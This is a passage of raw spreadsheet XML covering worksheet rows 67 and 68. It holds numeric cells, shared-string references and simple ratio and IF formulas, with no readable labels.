        <f t="shared" si="111"/>
        <v>-</v>
      </c>
      <c r="AU67" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV67" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW67" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX67" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY67" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ67" s="100">
        <v>0.0</v>
      </c>
      <c r="BA67" s="102">
        <v>2.0</v>
      </c>
      <c r="BB67" s="102">
        <v>0.0</v>
      </c>
      <c r="BC67" s="102">
        <v>0.0</v>
      </c>
      <c r="BD67" s="102">
        <v>0.0</v>
      </c>
      <c r="BE67" s="102">
        <v>0.0</v>
      </c>
      <c r="BF67" s="102">
        <v>0.0</v>
      </c>
      <c r="BG67" s="102">
        <v>0.0</v>
      </c>
      <c r="BH67" s="102">
        <v>0.0</v>
      </c>
      <c r="BI67" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ67" s="102">
        <v>0.0</v>
      </c>
      <c r="BK67" s="102">
        <v>0.0</v>
      </c>
      <c r="BL67" s="103">
        <f t="shared" ref="BL67:BL108" si="112">BB67/N67</f>
        <v>0</v>
      </c>
      <c r="BM67" s="103">
        <f t="shared" ref="BM67:BM108" si="113">BI67/N67</f>
        <v>0</v>
      </c>
      <c r="BN67" s="103">
        <f t="shared" ref="BN67:BN108" si="114">IF(BE67="-","-",BE67/N67)</f>
        <v>0</v>
      </c>
      <c r="BO67" s="103">
        <f t="shared" ref="BO67:BO108" si="115">BC67/P67</f>
        <v>0</v>
      </c>
      <c r="BP67" s="103">
        <f t="shared" ref="BP67:BP108" si="116">BJ67/P67</f>
        <v>0</v>
      </c>
      <c r="BQ67" s="103">
        <f t="shared" ref="BQ67:BQ108" si="117">IF(BG67="-","-",BG67/P67)</f>
        <v>0</v>
      </c>
      <c r="BR67" s="103">
        <f t="shared" ref="BR67:BR108" si="118">BD67/R67</f>
        <v>0</v>
      </c>
      <c r="BS67" s="103">
        <f t="shared" ref="BS67:BS108" si="119">BK67/R67</f>
        <v>0</v>
      </c>
      <c r="BT67" s="103">
        <f t="shared" ref="BT67:BT108" si="120">IF(BH67="-","-",BH67/R67)</f>
        <v>0</v>
      </c>
      <c r="BU67" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV67" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW67" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX67" s="104">
        <v>0.0</v>
      </c>
      <c r="BY67" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ67" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA67" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB67" s="104">
        <v>0.0</v>
      </c>
      <c r="CC67" s="104">
        <v>0.0</v>
      </c>
      <c r="CD67" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE67" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF67" s="104" t="str">
        <f t="shared" ref="CF67:CF76" si="121">IF(CD67="-",CE67,CD67)</f>
        <v>-</v>
      </c>
      <c r="CG67" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH67" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI67" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ67" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK67" s="104">
        <v>0.0</v>
      </c>
      <c r="CL67" s="104">
        <v>0.0</v>
      </c>
      <c r="CM67" s="105">
        <v>2.0</v>
      </c>
      <c r="CN67" s="105">
        <v>0.0</v>
      </c>
      <c r="CO67" s="105">
        <v>0.0</v>
      </c>
      <c r="CP67" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ67" s="105">
        <v>0.0</v>
      </c>
      <c r="CR67" s="105">
        <v>0.0</v>
      </c>
      <c r="CS67" s="105">
        <v>0.0</v>
      </c>
      <c r="CT67" s="105">
        <v>0.0</v>
      </c>
      <c r="CU67" s="105">
        <v>0.0</v>
      </c>
      <c r="CV67" s="105">
        <v>0.0</v>
      </c>
      <c r="CW67" s="105">
        <v>0.0</v>
      </c>
      <c r="CX67" s="105">
        <v>0.0</v>
      </c>
      <c r="CY67" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ67" s="105">
        <v>0.0</v>
      </c>
      <c r="DA67" s="105">
        <v>0.0</v>
      </c>
      <c r="DB67" s="106">
        <f t="shared" ref="DB67:DB108" si="122">CN67/N67</f>
        <v>0</v>
      </c>
      <c r="DC67" s="106">
        <f t="shared" ref="DC67:DC108" si="123">CW67/N67</f>
        <v>0</v>
      </c>
      <c r="DD67" s="106">
        <f t="shared" ref="DD67:DD108" si="124">IF(CS67="-","-",CS67/N67)</f>
        <v>0</v>
      </c>
      <c r="DE67" s="106">
        <f t="shared" ref="DE67:DE108" si="125">CO67/P67</f>
        <v>0</v>
      </c>
      <c r="DF67" s="106">
        <f t="shared" ref="DF67:DF108" si="126">CX67/P67</f>
        <v>0</v>
      </c>
      <c r="DG67" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH67" s="106">
        <f t="shared" ref="DH67:DH108" si="127">IF(CR67="-","-",CR67/R67)</f>
        <v>0</v>
      </c>
      <c r="DI67" s="106">
        <f t="shared" ref="DI67:DI108" si="128">IF(DA67="-","-",DA67/R67)</f>
        <v>0</v>
      </c>
      <c r="DJ67" s="106">
        <f t="shared" ref="DJ67:DJ108" si="129">IF(CV67="-","-",CV67/R67)</f>
        <v>0</v>
      </c>
      <c r="DK67" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL67" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM67" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN67" s="108">
        <v>0.0</v>
      </c>
      <c r="DO67" s="108">
        <v>0.0</v>
      </c>
      <c r="DP67" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ67" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR67" s="108">
        <v>0.0</v>
      </c>
      <c r="DS67" s="108">
        <v>0.0</v>
      </c>
      <c r="DT67" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU67" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV67" s="108" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DW67" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX67" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY67" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ67" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA67" s="108">
        <v>0.0</v>
      </c>
      <c r="EB67" s="108">
        <v>0.0</v>
      </c>
      <c r="EC67" s="109">
        <v>2.0</v>
      </c>
      <c r="ED67" s="109">
        <v>0.0</v>
      </c>
      <c r="EE67" s="109">
        <v>0.0</v>
      </c>
      <c r="EF67" s="109">
        <v>0.0</v>
      </c>
      <c r="EG67" s="109">
        <v>0.0</v>
      </c>
      <c r="EH67" s="109">
        <v>0.0</v>
      </c>
      <c r="EI67" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ67" s="109">
        <v>0.0</v>
      </c>
      <c r="EK67" s="109">
        <v>0.0</v>
      </c>
      <c r="EL67" s="109">
        <v>0.0</v>
      </c>
      <c r="EM67" s="109">
        <v>0.0</v>
      </c>
      <c r="EN67" s="109">
        <v>0.0</v>
      </c>
      <c r="EO67" s="109">
        <v>0.0</v>
      </c>
      <c r="EP67" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ67" s="109">
        <v>0.0</v>
      </c>
      <c r="ER67" s="110">
        <f t="shared" ref="ER67:ER108" si="130">ED67/N67</f>
        <v>0</v>
      </c>
      <c r="ES67" s="110">
        <f t="shared" ref="ES67:ES108" si="131">EM67/N67</f>
        <v>0</v>
      </c>
      <c r="ET67" s="110">
        <f t="shared" ref="ET67:ET108" si="132">IF(EI67="-","-",EI67/N67)</f>
        <v>0</v>
      </c>
      <c r="EU67" s="110">
        <f t="shared" ref="EU67:EU108" si="133">EE67/P67</f>
        <v>0</v>
      </c>
      <c r="EV67" s="110">
        <f t="shared" ref="EV67:EV108" si="134">EN67/P67</f>
        <v>0</v>
      </c>
      <c r="EW67" s="110">
        <f t="shared" ref="EW67:EW108" si="135">IF(EK67="-","-",EK67/P67)</f>
        <v>0</v>
      </c>
      <c r="EX67" s="110">
        <f t="shared" ref="EX67:EX108" si="136">IF(EH67="-","-",EH67/R67)</f>
        <v>0</v>
      </c>
      <c r="EY67" s="110">
        <f t="shared" ref="EY67:EY108" si="137">IF(EQ67="-","-",EQ67/R67)</f>
        <v>0</v>
      </c>
      <c r="EZ67" s="110">
        <f t="shared" ref="EZ67:EZ108" si="138">IF(EL67="-","-",EL67/R67)</f>
        <v>0</v>
      </c>
      <c r="FA67" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB67" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC67" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FD67" s="111">
        <v>2.0</v>
      </c>
      <c r="FE67" s="111">
        <v>4.0</v>
      </c>
      <c r="FF67" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG67" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH67" s="111">
        <v>0.0</v>
      </c>
      <c r="FI67" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ67" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK67" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL67" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM67" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN67" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO67" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP67" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ67" s="111">
        <v>0.0</v>
      </c>
      <c r="FR67" s="111">
        <v>0.0</v>
      </c>
      <c r="FS67" s="112">
        <v>2.0</v>
      </c>
      <c r="FT67" s="112">
        <v>2.0</v>
      </c>
      <c r="FU67" s="112">
        <v>3.0</v>
      </c>
      <c r="FV67" s="112">
        <v>0.0</v>
      </c>
      <c r="FW67" s="112">
        <v>4.0</v>
      </c>
      <c r="FX67" s="112">
        <v>4.0</v>
      </c>
      <c r="FY67" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ67" s="112">
        <v>0.0</v>
      </c>
      <c r="GA67" s="112">
        <v>0.0</v>
      </c>
      <c r="GB67" s="112">
        <v>0.0</v>
      </c>
      <c r="GC67" s="112">
        <v>0.0</v>
      </c>
      <c r="GD67" s="112">
        <v>0.0</v>
      </c>
      <c r="GE67" s="112">
        <v>0.0</v>
      </c>
      <c r="GF67" s="112">
        <v>0.0</v>
      </c>
      <c r="GG67" s="112">
        <v>0.0</v>
      </c>
      <c r="GH67" s="113">
        <f t="shared" ref="GH67:GH108" si="139">FT67/N67</f>
        <v>2</v>
      </c>
      <c r="GI67" s="113">
        <f t="shared" ref="GI67:GI108" si="140">GC67/N67</f>
        <v>0</v>
      </c>
      <c r="GJ67" s="113">
        <f t="shared" ref="GJ67:GJ108" si="141">IF(FY67="-","-",FY67/N67)</f>
        <v>0</v>
      </c>
      <c r="GK67" s="113">
        <f t="shared" ref="GK67:GK108" si="142">FU67/P67</f>
        <v>3</v>
      </c>
      <c r="GL67" s="113">
        <f t="shared" ref="GL67:GL108" si="143">GD67/P67</f>
        <v>0</v>
      </c>
      <c r="GM67" s="113">
        <f t="shared" ref="GM67:GM108" si="144">IF(GA67="-","-",GA67/P67)</f>
        <v>0</v>
      </c>
      <c r="GN67" s="113">
        <f t="shared" ref="GN67:GN108" si="145">IF(FX67="-","-",FX67/R67)</f>
        <v>4</v>
      </c>
      <c r="GO67" s="113">
        <f t="shared" ref="GO67:GO108" si="146">IF(GG67="-","-",GG67/R67)</f>
        <v>0</v>
      </c>
      <c r="GP67" s="113">
        <f t="shared" ref="GP67:GP108" si="147">IF(GB67="-","-",GB67/R67)</f>
        <v>0</v>
      </c>
      <c r="GQ67" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR67" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS67" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT67" s="94"/>
      <c r="GU67" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV67" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW67" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX67" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY67" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ67" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA67" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB67" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC67" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD67" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE67" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF67" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG67" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH67" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI67" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ67" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK67" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL67" s="93">
        <v>2.0</v>
      </c>
      <c r="HM67" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN67" s="93">
        <v>0.0</v>
      </c>
      <c r="HO67" s="93">
        <v>0.0</v>
      </c>
      <c r="HP67" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ67" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR67" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS67" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT67" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU67" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV67" s="119" t="s">
        <v>1305</v>
      </c>
      <c r="HW67" s="119">
        <v>2.0</v>
      </c>
      <c r="HX67" s="119">
        <v>2.0</v>
      </c>
      <c r="HY67" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ67" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA67" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB67" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC67" s="120" t="str">
        <f t="shared" ref="IC67:IC68" si="148">HV67</f>
        <v>56112, 54699</v>
      </c>
      <c r="ID67" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE67" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF67" s="120" t="s">
        <v>1305</v>
      </c>
      <c r="IG67" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH67" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II67" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ67" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK67" s="99">
        <v>2.0</v>
      </c>
      <c r="IL67" s="99">
        <v>0.0</v>
      </c>
      <c r="IM67" s="121">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="IN67" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO67" s="98">
        <v>0.0</v>
      </c>
      <c r="IP67" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ67" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR67" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS67" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT67" s="127"/>
      <c r="IU67" s="127"/>
      <c r="IV67" s="127"/>
      <c r="IW67" s="127"/>
      <c r="IX67" s="127"/>
      <c r="IY67" s="127"/>
      <c r="IZ67" s="127"/>
      <c r="JA67" s="127"/>
      <c r="JB67" s="127"/>
      <c r="JC67" s="127"/>
      <c r="JD67" s="127"/>
      <c r="JE67" s="127"/>
      <c r="JF67" s="127"/>
      <c r="JG67" s="127"/>
      <c r="JH67" s="127"/>
      <c r="JI67" s="127"/>
      <c r="JJ67" s="127"/>
      <c r="JK67" s="127"/>
      <c r="JL67" s="127"/>
      <c r="JM67" s="127"/>
      <c r="JN67" s="127"/>
      <c r="JO67" s="127"/>
      <c r="JP67" s="127"/>
      <c r="JQ67" s="127"/>
      <c r="JR67" s="127"/>
      <c r="JS67" s="127"/>
      <c r="JT67" s="127"/>
      <c r="JU67" s="127"/>
      <c r="JV67" s="127"/>
      <c r="JW67" s="127"/>
      <c r="JX67" s="127"/>
      <c r="JY67" s="127"/>
      <c r="JZ67" s="127"/>
      <c r="KA67" s="127"/>
      <c r="KB67" s="127"/>
      <c r="KC67" s="127"/>
      <c r="KD67" s="127"/>
      <c r="KE67" s="127"/>
      <c r="KF67" s="127"/>
      <c r="KG67" s="127"/>
      <c r="KH67" s="127"/>
      <c r="KI67" s="127"/>
      <c r="KJ67" s="127"/>
      <c r="KK67" s="127"/>
      <c r="KL67" s="127"/>
      <c r="KM67" s="127"/>
      <c r="KN67" s="127"/>
      <c r="KO67" s="127"/>
      <c r="KP67" s="127"/>
      <c r="KQ67" s="127"/>
      <c r="KR67" s="127"/>
      <c r="KS67" s="127"/>
      <c r="KT67" s="127"/>
      <c r="KU67" s="127"/>
      <c r="KV67" s="127"/>
      <c r="KW67" s="127"/>
      <c r="KX67" s="127"/>
      <c r="KY67" s="127"/>
      <c r="KZ67" s="127"/>
      <c r="LA67" s="127"/>
      <c r="LB67" s="127"/>
      <c r="LC67" s="127"/>
      <c r="LD67" s="127"/>
      <c r="LE67" s="127"/>
      <c r="LF67" s="127"/>
      <c r="LG67" s="127"/>
      <c r="LH67" s="127"/>
      <c r="LI67" s="127"/>
      <c r="LJ67" s="127"/>
      <c r="LK67" s="127"/>
      <c r="LL67" s="127"/>
      <c r="LM67" s="127"/>
      <c r="LN67" s="127"/>
      <c r="LO67" s="127"/>
      <c r="LP67" s="127"/>
      <c r="LQ67" s="127"/>
      <c r="LR67" s="127"/>
      <c r="LS67" s="127"/>
      <c r="LT67" s="127"/>
      <c r="LU67" s="127"/>
      <c r="LV67" s="127"/>
      <c r="LW67" s="127"/>
      <c r="LX67" s="127"/>
      <c r="LY67" s="127"/>
      <c r="LZ67" s="127"/>
      <c r="MA67" s="127"/>
      <c r="MB67" s="127"/>
      <c r="MC67" s="127"/>
      <c r="MD67" s="127"/>
      <c r="ME67" s="127"/>
      <c r="MF67" s="127"/>
      <c r="MG67" s="127"/>
      <c r="MH67" s="127"/>
      <c r="MI67" s="127"/>
      <c r="MJ67" s="127"/>
      <c r="MK67" s="127"/>
      <c r="ML67" s="127"/>
      <c r="MM67" s="127"/>
      <c r="MN67" s="127"/>
      <c r="MO67" s="127"/>
      <c r="MP67" s="127"/>
      <c r="MQ67" s="127"/>
      <c r="MR67" s="127"/>
      <c r="MS67" s="127"/>
      <c r="MT67" s="127"/>
      <c r="MU67" s="127"/>
      <c r="MV67" s="127"/>
      <c r="MW67" s="127"/>
      <c r="MX67" s="127"/>
      <c r="MY67" s="127"/>
      <c r="MZ67" s="127"/>
      <c r="NA67" s="127"/>
      <c r="NB67" s="127"/>
      <c r="NC67" s="127"/>
      <c r="ND67" s="127"/>
      <c r="NE67" s="127"/>
      <c r="NF67" s="127"/>
      <c r="NG67" s="127"/>
      <c r="NH67" s="127"/>
      <c r="NI67" s="127"/>
      <c r="NJ67" s="127"/>
      <c r="NK67" s="127"/>
      <c r="NL67" s="127"/>
      <c r="NM67" s="127"/>
      <c r="NN67" s="127"/>
      <c r="NO67" s="127"/>
      <c r="NP67" s="127"/>
      <c r="NQ67" s="127"/>
      <c r="NR67" s="127"/>
      <c r="NS67" s="127"/>
      <c r="NT67" s="127"/>
      <c r="NU67" s="127"/>
      <c r="NV67" s="127"/>
      <c r="NW67" s="127"/>
      <c r="NX67" s="127"/>
      <c r="NY67" s="127"/>
    </row>
    <row r="68" ht="153.75" customHeight="1">
      <c r="B68" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C68" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D68" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E68" s="90" t="s">
        <v>1306</v>
      </c>
      <c r="F68" s="90" t="s">
        <v>1307</v>
      </c>
      <c r="G68" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H68" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I68" s="92" t="s">
        <v>1308</v>
      </c>
      <c r="J68" s="92" t="s">
        <v>1309</v>
      </c>
      <c r="K68" s="92" t="s">
        <v>1310</v>
      </c>
      <c r="L68" s="93" t="s">
        <v>1311</v>
      </c>
      <c r="M68" s="93">
        <v>2.0</v>
      </c>
      <c r="N68" s="93">
        <v>1.0</v>
      </c>
      <c r="O68" s="93">
        <v>0.0</v>
      </c>
      <c r="P68" s="93">
        <v>1.0</v>
      </c>
      <c r="Q68" s="93">
        <f t="shared" si="103"/>
        <v>1</v>
      </c>
      <c r="R68" s="93">
        <v>1.0</v>
      </c>
      <c r="S68" s="93">
        <v>0.0</v>
      </c>
      <c r="T68" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U68" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V68" s="155" t="s">
        <v>1312</v>
      </c>
      <c r="W68" s="96" t="s">
        <v>1313</v>
      </c>
      <c r="X68" s="126" t="s">
        <v>1314</v>
      </c>
      <c r="Y68" s="126" t="s">
        <v>1315</v>
      </c>
      <c r="Z68" s="132" t="s">
        <v>1316</v>
      </c>
      <c r="AA68" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB68" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC68" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD68" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE68" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF68" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG68" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH68" s="99" t="s">
        <v>1317</v>
      </c>
      <c r="AI68" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ68" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK68" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL68" s="100">
        <v>0.0</v>
      </c>
      <c r="AM68" s="100">
        <v>0.0</v>
      </c>
      <c r="AN68" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO68" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP68" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ68" s="100">
        <v>0.0</v>
      </c>
      <c r="AR68" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS68" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT68" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU68" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV68" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW68" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX68" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY68" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ68" s="100">
        <v>0.0</v>
      </c>
      <c r="BA68" s="102">
        <v>2.0</v>
      </c>
      <c r="BB68" s="102">
        <v>0.0</v>
      </c>
      <c r="BC68" s="102">
        <v>0.0</v>
      </c>
      <c r="BD68" s="102">
        <v>0.0</v>
      </c>
      <c r="BE68" s="102">
        <v>0.0</v>
      </c>
      <c r="BF68" s="102">
        <v>0.0</v>
      </c>
      <c r="BG68" s="102">
        <v>0.0</v>
      </c>
      <c r="BH68" s="102">
        <v>0.0</v>
      </c>
      <c r="BI68" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ68" s="102">
        <v>0.0</v>
      </c>
      <c r="BK68" s="102">
        <v>0.0</v>
      </c>
      <c r="BL68" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM68" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN68" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO68" s="103">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="BP68" s="103">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BQ68" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR68" s="103">
        <f t="shared" si="118"/>
        <v>0</v>
      </c>
      <c r="BS68" s="103">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="BT68" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU68" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV68" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW68" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX68" s="104">
        <v>0.0</v>
      </c>
      <c r="BY68" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ68" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA68" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB68" s="104">
        <v>0.0</v>
      </c>
      <c r="CC68" s="104">
        <v>0.0</v>
      </c>
      <c r="CD68" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE68" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF68" s="104" t="str">
        <f t="shared" si="121"/>
        <v>-</v>
      </c>
      <c r="CG68" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH68" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI68" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ68" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK68" s="104">
        <v>0.0</v>
      </c>
      <c r="CL68" s="104">
        <v>0.0</v>
      </c>
      <c r="CM68" s="105">
        <v>2.0</v>
      </c>
      <c r="CN68" s="105">
        <v>0.0</v>
      </c>
      <c r="CO68" s="105">
        <v>0.0</v>
      </c>
      <c r="CP68" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ68" s="105">
        <v>0.0</v>
      </c>
      <c r="CR68" s="105">
        <v>0.0</v>
      </c>
      <c r="CS68" s="105">
        <v>0.0</v>
      </c>
      <c r="CT68" s="105">
        <v>0.0</v>
      </c>
      <c r="CU68" s="105">
        <v>0.0</v>
      </c>
      <c r="CV68" s="105">
        <v>0.0</v>
      </c>
      <c r="CW68" s="105">
        <v>0.0</v>
      </c>
      <c r="CX68" s="105">
        <v>0.0</v>
      </c>
      <c r="CY68" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ68" s="105">
        <v>0.0</v>
      </c>
      <c r="DA68" s="105">
        <v>0.0</v>
      </c>
      <c r="DB68" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC68" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD68" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE68" s="106">
        <f t="shared" si="125"/>
        <v>0</v>
      </c>
      <c r="DF68" s="106">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="DG68" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH68" s="106">
        <f t="shared" si="127"/>
        <v>0</v>
      </c>
      <c r="DI68" s="106">
        <f t="shared" si="128"/>
        <v>0</v>
      </c>
      <c r="DJ68" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK68" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL68" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM68" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN68" s="108">
        <v>0.0</v>
      </c>
      <c r="DO68" s="108">
        <v>0.0</v>
      </c>
      <c r="DP68" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ68" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR68" s="108">
        <v>0.0</v>
      </c>
      <c r="DS68" s="108">
        <v>0.0</v>
      </c>
      <c r="DT68" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU68" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV68" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DW68" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX68" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY68" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ68" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA68" s="108">
        <v>0.0</v>
      </c>
      <c r="EB68" s="108">
        <v>0.0</v>
      </c>
      <c r="EC68" s="109">
        <v>2.0</v>
      </c>
      <c r="ED68" s="109">
        <v>0.0</v>
      </c>
      <c r="EE68" s="109">
        <v>0.0</v>
      </c>
      <c r="EF68" s="109">
        <v>0.0</v>
      </c>
      <c r="EG68" s="109">
        <v>0.0</v>
      </c>
      <c r="EH68" s="109">
        <v>0.0</v>
      </c>
      <c r="EI68" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ68" s="109">
        <v>0.0</v>
      </c>
      <c r="EK68" s="109">
        <v>0.0</v>
      </c>
      <c r="EL68" s="109">
        <v>0.0</v>
      </c>
      <c r="EM68" s="109">
        <v>0.0</v>
      </c>
      <c r="EN68" s="109">
